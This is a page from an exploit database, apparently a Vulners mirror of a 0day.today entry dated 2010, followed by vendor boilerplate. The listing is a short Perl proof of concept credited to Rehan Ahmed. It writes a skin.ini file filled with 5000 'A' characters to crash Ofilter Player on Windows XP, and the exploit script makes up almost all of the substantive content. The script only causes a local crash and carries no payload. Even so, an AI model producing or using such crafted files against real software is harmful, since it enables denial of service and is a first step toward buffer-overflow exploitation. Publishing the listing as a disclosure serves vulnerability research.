Lucene search
K

Ofilter Player (skin.ini) Local Crash PoC

🗓️ 13 Jan 2010 00:00:00Reported by Rehan AhmedType 
zdt
 zdt
🔗 0day.today👁 18 Views

Ofilter Player (skin.ini) Local Crash PoC - Exploi

Code
=========================================
Ofilter Player (skin.ini) Local Crash PoC
=========================================

#!/usr/bin/perl
#Exploit Title: Ofilter Player (skin.ini) Local Crash PoC
#Author:Vulnerability Discovered By Rehan Ahmed ([email protected])
#Tested On: WinXP SP2
 
my $boom="\x41" x 5000;
my $file="skin1.ini"; #C:\Program Files\OfilterPlayer\skin
open($FILE,">$file");
print $FILE $boom;
close($FILE);
print "File Successfully Created\n";



#  0day.today [2018-03-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation